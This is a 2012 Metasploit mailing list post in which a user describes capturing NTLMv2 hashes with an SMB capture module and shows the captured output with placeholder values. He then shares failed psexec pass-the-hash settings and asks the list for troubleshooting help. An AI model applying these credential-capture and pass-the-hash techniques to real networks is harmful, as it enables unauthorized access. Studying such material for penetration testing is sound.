Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

metasploit auxiliary/server/capture/smb and pass the hash

From: macubergeek <macubergeek () comcast net>
Date: Thu, 5 Apr 2012 04:54:09 -0400
I've been working with the metasploit auxiliary/server/capture/smb module and have had good success capturing smb 
hashes.

[*] Empty hash captured from 192.168.1.1:1981 captured, ignoring ... 
[*] 2012-03-30 22:57:24 -0400
NTLMv2 Response Captured from 192.168.1.1:1981 
USER:DomainUser DOMAIN:MASSIVE OS:Windows 2002 Service Pack 3 2600 LM:Windows
2002 5.1
LMHASH:AAAAAAAAAAAAAAAABBBBBBBBBBBBBBBB  LM_CLIENT_CHALLENGE:cf4000a12bdec1ad
NTHASH:CCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDD
NT_CLIENT_CHALLENGE:0101000000000000f89c09009812cd01cf4000a12bdec1ad0000
0000020000000000000000000000

Chris Gates's Carnal Ownage blog suggests cracking the A's with John and guessing at the B's

My questions are:
does the "Empty hash captured" signify that the LM hash was disabled on this box?

Passing the hash
I've tried passing the hash using exploit/windows/smb/psexec  configured like so

Module options (exploit/windows/smb/psexec):

   Name       Current Setting                                                    Required  Description
   ----       ---------------                                                    --------  -----------
   RHOST      192.168.1.1                                                        yes       The target address
   RPORT      445                                                                yes       Set the SMB service port
   SHARE      ADMIN$                                                             yes       The share to connect to, can 
be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain  MASSIVE                                                            no        The Windows domain to use 
for authentication
   SMBPass    AAAAAAAAAAAAAAAABBBBBBBBBBBBBBBB:CCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDD  no        The password for the 
specified username
   SMBUser    DomainUser                                                         no        The username to authenticate 
as


Exploit target:

   Id  Name
   --  ----
   0   Automatic

This results in authentication/Login errors.
I realize I can't pass the hash against DomainUser on his box while he's logged in but does anyone know if I can say 
use a domain admin cred against DomainUser's box? I've tried doing psexec against DomainUser's box after he logged out 
of the machine and still no go. I'm not sure if pass the hash works here or if I'm using the correct answer for SMBPass.

Jim
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
%49%66%20%79%6F%75%20%63%61%6E%20%72%65%61%64%20%74%68%69%73%20%79%6F%75%20%6E%65%65%64%20%74%6F%20%67%65%74%20%61%20%67%69%72%6C%66%72%69%65%6E%64%2E



_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
Previous By Date Next
Previous By Thread Next

Current thread: